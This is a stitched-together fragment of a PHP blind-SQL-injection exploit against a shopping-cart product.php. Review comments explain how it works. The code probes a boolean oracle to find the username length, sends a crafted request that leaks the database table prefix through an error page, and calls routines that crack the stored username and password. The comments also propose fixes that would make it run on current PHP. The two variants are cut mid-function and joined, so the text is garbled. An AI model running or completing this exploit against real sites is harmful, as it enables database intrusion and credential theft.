/*
 * NOTE(review): collapsed fragment of a PHP blind-SQL-injection helper script. The
 * function whose body opens with `{ echo "[+] username length: "` has its signature
 * OUTSIDE this excerpt; from the top-level call that follows it is presumably
 * lengthcolumns($hostname, $path, $chs, $goodid) -- $chs, $hostname, $path and $goodid
 * are read but never assigned in the visible body, so they must be parameters or
 * globals. Confirm against the full file before relying on that.
 *
 * What the visible body does:
 *   - probes $pos = 1..20 by calling exploit($hostname, $path, $pos, $chr, $chs,
 *     $goodid) with $chr fixed at 0, and treats a case-insensitive
 *     "javascript:addToCart" substring in the returned response as the boolean
 *     oracle's "true"; the first matching $pos is echoed and returned.
 *   - past 20 probes it calls exit("Exploit failed"), i.e. it kills the whole process
 *     from inside the helper rather than returning an error to the caller.
 *   - `$exit = 1` before `break` is dead: the break alone leaves the loop.
 *   - exploit(), usage(), crkusername() and crkpassword() are defined elsewhere; the
 *     SQL payload they build is not visible here, so nothing below can be said about
 *     how $pos/$chr are encoded into the injected query.
 *
 * Security-relevant caveats for anyone running or reviewing this:
 *   - the oracle is a single substring match with no response-length or status check;
 *     a target that always (or never) emits the marker makes every probe read as the
 *     same value and the hard 20-probe cap is the only thing stopping the loop.
 *   - the top-level run requires exactly 3 positional args (hostname, path, goodid)
 *     and passes them through unvalidated; the sibling fragment on the next line
 *     expects only 2, so these appear to be two separate script variants concatenated.
 *   - $length returned by lengthcolumns() is captured and then never used.
 */
{ echo "[+] username length: "; $exit = 0; $length = 0; $pos = 1; $chr = 0; while ($exit == 0) { $response = exploit($hostname, $path, $pos, $chr, $chs, $goodid); if (preg_match("/javascript:addToCart/i", $response)) { $exit = 1; $length = $pos; break; } else { $pos++; if ($pos > 20) { exit("Exploit failed"); } } } echo $length . "\n"; return $length; } if ($argc != 4) { usage(); } $hostname = $argv[1]; $path = $argv[2]; $goodid = $argv[3]; $length = lengthcolumns($hostname, $path, 3, $goodid); crkusername($hostname, $path, 1, $goodid); crkpassword($hostname, $path, 2, $goodid);
/*
 * NOTE(review): collapsed fragment. The function body that opens this line has its
 * signature OUTSIDE the excerpt; from the later call `getprefix($hostname, $path)` and
 * the `return $match[1] / return false` shape it is presumably getprefix() -- confirm.
 *
 * What the visible body does: opens a raw TCP socket to $hostname:80, sends a hand-built
 * HTTP/1.1 GET for {$path}/product.php?q=&action=searchlist&where=%23 (%23 is '#',
 * presumably to break the query and provoke an error page that echoes the SQL), reads
 * the response to EOF, and regex-extracts the table prefix from a `FROM `<prefix>yp_product`
 * fragment in the reply.
 *
 * Defects in the visible code (not fixed here because the enclosing definition is cut):
 *   - preg_match('/FROM `(.+)yp_product/ie', ...): the 'e' (eval) modifier only ever
 *     applied to preg_replace; on PHP 7 and later it is rejected, preg_match returns
 *     false, $match stays empty and this helper always returns false -> "Exploit failed".
 *     Drop the 'e' (`'/FROM `(.+)yp_product/i'`). Even on old PHP the greedy `(.+)`
 *     captures up to the LAST "yp_product" in the page, which may include more than the
 *     prefix if the string occurs twice.
 *   - fsockopen() return value is never checked; on a failed connect $conn is false and
 *     fputs()/feof() emit warnings (a TypeError on PHP 8), and the loop condition may
 *     never become true.
 *   - $reply is appended to before being initialised (undefined-variable notice).
 *   - `$match[1]` is read without isset(); when the regex does not match this is an
 *     undefined-index notice (warning on PHP 8) rather than a clean false.
 *   - no stream_set_timeout(): fsockopen's timeout covers only the connect, so a server
 *     that accepts and then stalls hangs the script in the feof() loop indefinitely.
 *
 * Operational caveats: port 80 is hard-coded (no TLS); $hostname and $path come from
 * $argv unvalidated and are interpolated straight into the request line and Host
 * header, so a CRLF in $path would inject headers (low impact -- it is the operator's
 * own input, but worth knowing). The top-level run expects exactly 2 positional args
 * (hostname, path), unlike the 3-arg variant on the previous line; $length from
 * lengthcolumns() is again computed and discarded; the later usage() call and the
 * crkusername()/crkpassword()/lengthcolumns() helpers are defined elsewhere in the file.
 */
$conn = fsockopen($hostname, 80); $request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n"; $request .= "Host: {$hostname}\r\n"; $request .= "Connection: Close\r\n\r\n"; fputs($conn, $request); while (!feof($conn)) { $reply .= fgets($conn, 1024); } fclose($conn); preg_match('/FROM `(.+)yp_product/ie', $reply, $match); if ($match[1]) { return $match[1]; } else { return false; } } if ($argc != 3) { usage(); } $prefix = ""; $hostname = $argv[1]; $path = $argv[2]; $prefix = getprefix($hostname, $path); if ($prefix) { echo $prefix . "\r\n"; $length = lengthcolumns($hostname, $path, 3); crkusername($hostname, $path, 1); crkpassword($hostname, $path, 2); } else { exit("Exploit failed"); }